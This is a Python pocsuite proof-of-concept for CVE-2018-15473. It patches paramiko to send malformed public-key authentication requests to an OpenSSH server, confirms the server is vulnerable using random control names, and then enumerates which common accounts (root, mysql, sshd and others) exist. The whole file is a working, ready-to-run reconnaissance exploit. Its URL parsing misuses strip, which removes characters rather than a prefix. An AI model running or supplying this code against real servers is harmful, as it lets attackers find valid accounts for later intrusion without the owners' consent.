#!/usr/bin/python
# -*- coding: utf-8 -*-
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase
import paramiko
import socket
import string
from random import randint as rand
from random import choice as choice

# Keep a reference to paramiko's own MSG_SERVICE_ACCEPT handler. It is captured
# at import time, before openssh.__init__ overwrites that table entry with
# malform_packet, so malform_packet can still delegate to the real handler.
old_parse_service_accept = paramiko.auth_handler.AuthHandler._handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
class BadUsername(Exception):
    """Signals that the server answered the probe with MSG_USERAUTH_FAILURE.

    Raised by ``call_error`` (installed as the MSG_USERAUTH_FAILURE handler);
    ``openssh.checkUsername`` maps it to "username does not exist".
    An optional message may be passed like any other exception.
    """
def add_boolean(*args, **kwargs):
    """Stand-in for ``paramiko.message.Message.add_boolean`` that writes nothing.

    ``malform_packet`` swaps this in temporarily so the packet being built
    lacks its boolean field(s), i.e. is malformed. Every argument is ignored
    and the function returns None.
    """

def call_error(*args, **kwargs):
    """MSG_USERAUTH_FAILURE handler that always signals an invalid username.

    Installed into paramiko's handler table by ``openssh.__init__``; all
    arguments are ignored and ``BadUsername`` is raised unconditionally.
    """
    error = BadUsername()
    raise error

def malform_packet(*args, **kwargs):
    """Run paramiko's MSG_SERVICE_ACCEPT handler with ``add_boolean`` disabled.

    For the duration of the wrapped call, ``Message.add_boolean`` is replaced
    by the no-op ``add_boolean``, so any packet built by that handler is
    missing its boolean field(s). This is the malformed request the probe
    relies on. All arguments are forwarded unchanged and the handler's
    return value is returned.
    """
    original_add_boolean = paramiko.message.Message.add_boolean
    paramiko.message.Message.add_boolean = add_boolean
    try:
        return old_parse_service_accept(*args, **kwargs)
    finally:
        # Always restore, even if the handler raises; otherwise every later
        # message in this process would silently drop its booleans and
        # start_client() would stop working.
        paramiko.message.Message.add_boolean = original_add_boolean
class openssh(object):
    """CVE-2018-15473 username-enumeration checker for one SSH endpoint.

    Constructing an instance patches paramiko's client-side
    ``AuthHandler._handler_table`` (a class-level table, so the change is
    process-wide):

    * MSG_SERVICE_ACCEPT is routed through ``malform_packet``;
    * MSG_USERAUTH_FAILURE raises ``BadUsername``.
    """

    def __init__(self, hostname, port):
        # Three random 15-20 character lowercase names used as a control:
        # if the server reports any of them as existing, the oracle is not
        # reliable and checkVulnerable() returns False.
        self.random_username_list = [
            "".join(choice(string.ascii_lowercase) for _ in range(rand(15, 20)))
            for _ in range(3)
        ]
        handler_table = paramiko.auth_handler.AuthHandler._handler_table
        handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = malform_packet
        handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = call_error
        self.hostname = hostname
        self.port = int(port)
        # Common account names probed once the target looks vulnerable.
        self.userList = ["root", "example", "nobody", "mail", "sshd", "mysql"]

    def checkVulnerable(self):
        """Return True if every random control username is reported invalid.

        All control names are probed (no short-circuit), so any probe error
        still surfaces.
        """
        verdicts = [self.checkUsername(self.hostname, self.port, user)[1]
                    for user in self.random_username_list]
        return not any(verdicts)

    def checkUserlist(self, username_list):
        """Return the names from ``username_list`` the server reports as existing."""
        probes = (self.checkUsername(self.hostname, self.port, user)
                  for user in username_list)
        return [name for name, exists in probes if exists]

    def checkUsername(self, hostname, port, username, tried=0):
        """Probe a single username over a fresh connection.

        Opens a TCP connection and SSH transport, then attempts public-key
        auth with a throwaway 1024-bit RSA key while the patched handlers
        (see ``__init__``) are in place. The transport and socket are always
        closed before returning.

        :param hostname: target host.
        :param port: target port (anything ``int()`` accepts).
        :param username: name to probe.
        :param tried: negotiation retries already used; callers normally
            leave the default.
        :returns: ``(username, False)`` when the server answers with
            MSG_USERAUTH_FAILURE (``BadUsername``); ``(username, True)`` when
            auth fails with ``AuthenticationException`` instead.
        :raises paramiko.ssh_exception.SSHException: if transport negotiation
            still fails after 4 retries.
        :raises Exception: if authentication unexpectedly completes.
        """
        while True:
            sock = socket.socket()
            transport = None
            try:
                sock.connect((hostname, int(port)))
                transport = paramiko.transport.Transport(sock)
                try:
                    transport.start_client()
                except paramiko.ssh_exception.SSHException:
                    # Server was likely flooded: retry up to 4 times on a new
                    # connection, then give up instead of authenticating on a
                    # dead transport.
                    if tried < 4:
                        tried += 1
                        continue
                    print('[-] Failed to negotiate SSH transport')
                    raise
                try:
                    transport.auth_publickey(username, paramiko.RSAKey.generate(1024))
                except BadUsername:
                    return (username, False)
                except paramiko.ssh_exception.AuthenticationException:
                    return (username, True)
                raise Exception("There was an error. Is this the correct version of OpenSSH?")
            finally:
                if transport is not None:
                    transport.close()
                sock.close()

    def run(self):
        """Check reachability and vulnerability, then enumerate ``userList``.

        :returns: False if the port is unreachable, the target is not
            vulnerable, or ``userList`` is empty; otherwise the list of
            usernames from ``userList`` reported as existing.
        """
        probe = socket.socket()
        try:
            probe.connect((self.hostname, self.port))
        except socket.error:
            return False
        finally:
            probe.close()
        if not self.checkVulnerable():
            return False
        if not self.userList:
            return False  # no usernames to test
        return self.checkUserlist(self.userList)

def poc(url):
    if url.startswith("http://"):
        url = url.strip("http://")
    if url.endswith("/"):
        url = url.strip("/")
    if ":" in url:
        url = url.split(":")
        ip = url[0]
        port = url[1]
        response = openssh(ip, port).run()
        return response
    else:
        ip=url
        response = openssh(ip, "22").run()
        return response
class TestPOC(POCBase):
    """pocsuite POC for CVE-2018-15473 (OpenSSH username enumeration)."""

    name = 'openssh_username_enumeration_CVE-2018-15473'
    vulID = 'CVE-2018-15473'
    author = ['sxd']
    vulType = 'username_enumeration'
    version = '1.0'  # default version: 1.0
    references = ['https://www.anquanke.com/post/id/157607']
    # English summary of ``desc``: sending an OpenSSH server a malformed
    # public-key authentication request reveals whether a username exists.
    # For a nonexistent user the server replies with an authentication-failure
    # message; for an existing user parsing fails and the server drops the
    # connection without replying.
    desc = '''
		   通过向OpenSSH服务器发送一个错误格式的公钥认证请求，可以判断是否存在特定的用户名。
		   如果用户名不存在，那么服务器会发给客户端一个验证失败的消息。
		   如果用户名存在，那么将因为解析失败，不返回任何信息，直接中断通讯。
		   '''
    vulDate = '2020-03-07'
    createDate = '2020-03-07'
    updateDate = '2020-03-07'
    appName = 'openssh'
    appVersion = 'OpenSSH <= 7.7'
    appPowerLink = ''
    # NOTE(review): these look like dependency names rather than sample
    # targets; confirm what pocsuite expects in ``samples``.
    samples = ['paramiko','socket','argparse']

    def _attack(self):
        '''attack mode: identical to verify mode for this POC.'''
        return self._verify()

    def _verify(self):
        '''verify mode: run the check and report any enumerated usernames.'''
        result = {}
        response = poc(self.url)
        if response:
            result['VerifyInfo'] = {}
            # Keep the target and the POC name visibly separated.
            result['VerifyInfo']['URL'] = self.url + ' openssh_username_enumeration_CVE-2018-15473 exists!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = response
        return self.parse_output(result)

    def parse_output(self, result):
        '''Wrap ``result`` in an Output: success if non-empty, otherwise fail.'''
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


# Register the POC class with pocsuite via pocsuite.api.poc.register.
register(TestPOC)
